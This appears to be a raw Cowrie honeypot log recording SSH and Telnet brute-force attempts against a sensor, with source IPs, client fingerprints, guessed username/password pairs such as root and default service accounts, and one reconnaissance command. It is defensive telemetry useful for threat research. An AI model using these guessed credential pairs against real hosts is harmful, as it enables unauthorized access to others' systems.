{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:30:26.489125Z","src_ip":"212.227.235.229","session":"174fdfe1a81f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":41106,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c30742da47a","protocol":"ssh","message":"New connection: 217.154.1.158:41106 (1.2.3.4:22) [session: 0c30742da47a]","sensor":"my-vps","timestamp":"2025-08-26T19:30:31.755795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:30:31.756965Z","src_ip":"217.154.1.158","session":"0c30742da47a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:30:31.776949Z","src_ip":"217.154.1.158","session":"0c30742da47a"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:30:31.823842Z","src_ip":"217.154.1.158","session":"0c30742da47a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:30:31.929521Z","src_ip":"217.154.1.158","session":"0c30742da47a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:30:31.930412Z","src_ip":"217.154.1.158","session":"0c30742da47a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:30:31.946563Z","src_ip":"217.154.1.158","session":"0c30742da47a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:30:31.947981Z","src_ip":"217.154.1.158","session":"0c30742da47a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49302,"dst_ip":"1.2.3.4","dst_port":22,"session":"c15de9422aed","protocol":"ssh","message":"New connection: 212.227.235.229:49302 (1.2.3.4:22) [session: c15de9422aed]","sensor":"my-vps","timestamp":"2025-08-26T19:30:40.972923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:30:41.635792Z","src_ip":"212.227.235.229","session":"c15de9422aed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:30:41.636861Z","src_ip":"212.227.235.229","session":"c15de9422aed"}
{"eventid":"cowrie.login.success","username":"root","password":"alireza1381","message":"login attempt [root/alireza1381] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:30:45.939100Z","src_ip":"212.227.235.229","session":"c15de9422aed"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:30:46.633644Z","src_ip":"212.227.235.229","session":"c15de9422aed"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52080,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dfd703942bb","protocol":"ssh","message":"New connection: 217.154.1.158:52080 (1.2.3.4:22) [session: 2dfd703942bb]","sensor":"my-vps","timestamp":"2025-08-26T19:30:49.195338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:30:49.196403Z","src_ip":"217.154.1.158","session":"2dfd703942bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:30:49.211078Z","src_ip":"217.154.1.158","session":"2dfd703942bb"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:30:49.255931Z","src_ip":"217.154.1.158","session":"2dfd703942bb"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:30:50.272540Z","src_ip":"217.154.1.158","session":"2dfd703942bb"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39214,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee15ac5aa632","protocol":"ssh","message":"New connection: 217.154.1.158:39214 (1.2.3.4:22) [session: ee15ac5aa632]","sensor":"my-vps","timestamp":"2025-08-26T19:31:06.668279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:31:06.669592Z","src_ip":"217.154.1.158","session":"ee15ac5aa632"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:31:06.684456Z","src_ip":"217.154.1.158","session":"ee15ac5aa632"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:31:06.728444Z","src_ip":"217.154.1.158","session":"ee15ac5aa632"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:31:07.745389Z","src_ip":"217.154.1.158","session":"ee15ac5aa632"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":57252,"dst_ip":"1.2.3.4","dst_port":22,"session":"2636ead6385f","protocol":"ssh","message":"New connection: 217.154.1.158:57252 (1.2.3.4:22) [session: 2636ead6385f]","sensor":"my-vps","timestamp":"2025-08-26T19:31:24.191137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:31:24.192995Z","src_ip":"217.154.1.158","session":"2636ead6385f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:31:24.206797Z","src_ip":"217.154.1.158","session":"2636ead6385f"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:31:24.249662Z","src_ip":"217.154.1.158","session":"2636ead6385f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:31:25.269940Z","src_ip":"217.154.1.158","session":"2636ead6385f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51210,"dst_ip":"1.2.3.4","dst_port":22,"session":"43315dca7801","protocol":"ssh","message":"New connection: 217.154.1.158:51210 (1.2.3.4:22) [session: 43315dca7801]","sensor":"my-vps","timestamp":"2025-08-26T19:31:41.821878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:31:41.822849Z","src_ip":"217.154.1.158","session":"43315dca7801"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:31:41.837185Z","src_ip":"217.154.1.158","session":"43315dca7801"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:31:41.880762Z","src_ip":"217.154.1.158","session":"43315dca7801"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:31:42.895783Z","src_ip":"217.154.1.158","session":"43315dca7801"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56506,"dst_ip":"1.2.3.4","dst_port":23,"session":"b508befd520d","protocol":"telnet","message":"New connection: 212.227.235.229:56506 (1.2.3.4:23) [session: b508befd520d]","sensor":"my-vps","timestamp":"2025-08-26T19:31:58.016656Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48116,"dst_ip":"1.2.3.4","dst_port":22,"session":"6474d1f2a63c","protocol":"ssh","message":"New connection: 217.154.1.158:48116 (1.2.3.4:22) [session: 6474d1f2a63c]","sensor":"my-vps","timestamp":"2025-08-26T19:31:59.204943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:31:59.205713Z","src_ip":"217.154.1.158","session":"6474d1f2a63c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:31:59.220498Z","src_ip":"217.154.1.158","session":"6474d1f2a63c"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:31:59.270306Z","src_ip":"217.154.1.158","session":"6474d1f2a63c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:31:59.317983Z","src_ip":"217.154.1.158","session":"6474d1f2a63c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:31:59.318848Z","src_ip":"217.154.1.158","session":"6474d1f2a63c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:31:59.334244Z","src_ip":"217.154.1.158","session":"6474d1f2a63c"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:31:59.335509Z","src_ip":"217.154.1.158","session":"6474d1f2a63c"}
{"eventid":"cowrie.session.closed","duration":15.195047855377197,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:13.211622Z","src_ip":"212.227.235.229","session":"b508befd520d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58002,"dst_ip":"1.2.3.4","dst_port":22,"session":"a95dc9258b4b","protocol":"ssh","message":"New connection: 217.72.205.35:58002 (1.2.3.4:22) [session: a95dc9258b4b]","sensor":"my-vps","timestamp":"2025-08-26T19:32:16.548983Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:16.550226Z","src_ip":"217.72.205.35","session":"a95dc9258b4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53004,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdf7d0e00483","protocol":"telnet","message":"New connection: 212.227.235.229:53004 (1.2.3.4:23) [session: fdf7d0e00483]","sensor":"my-vps","timestamp":"2025-08-26T19:32:16.562212Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33814,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4e615cce996","protocol":"ssh","message":"New connection: 217.154.1.158:33814 (1.2.3.4:22) [session: a4e615cce996]","sensor":"my-vps","timestamp":"2025-08-26T19:32:16.874031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:32:16.874808Z","src_ip":"217.154.1.158","session":"a4e615cce996"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:32:16.889915Z","src_ip":"217.154.1.158","session":"a4e615cce996"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-26T19:32:16.952180Z","src_ip":"217.154.1.158","session":"a4e615cce996"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42964,"dst_ip":"1.2.3.4","dst_port":23,"session":"b78c0846385a","protocol":"telnet","message":"New connection: 212.227.235.229:42964 (1.2.3.4:23) [session: b78c0846385a]","sensor":"my-vps","timestamp":"2025-08-26T19:32:17.037173Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:17.967918Z","src_ip":"217.154.1.158","session":"a4e615cce996"}
{"eventid":"cowrie.session.closed","duration":3.119216203689575,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:19.681365Z","src_ip":"212.227.235.229","session":"fdf7d0e00483"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53050,"dst_ip":"1.2.3.4","dst_port":23,"session":"1bd44c22318b","protocol":"telnet","message":"New connection: 212.227.235.229:53050 (1.2.3.4:23) [session: 1bd44c22318b]","sensor":"my-vps","timestamp":"2025-08-26T19:32:23.172618Z"}
{"eventid":"cowrie.session.closed","duration":15.856330871582031,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:32.893432Z","src_ip":"212.227.235.229","session":"b78c0846385a"}
{"eventid":"cowrie.session.closed","duration":10.324389457702637,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:32:33.496948Z","src_ip":"212.227.235.229","session":"1bd44c22318b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55442,"dst_ip":"1.2.3.4","dst_port":22,"session":"d51148ac43fb","protocol":"ssh","message":"New connection: 217.154.1.158:55442 (1.2.3.4:22) [session: d51148ac43fb]","sensor":"my-vps","timestamp":"2025-08-26T19:32:34.333826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:32:34.334625Z","src_ip":"217.154.1.158","session":"d51148ac43fb"}
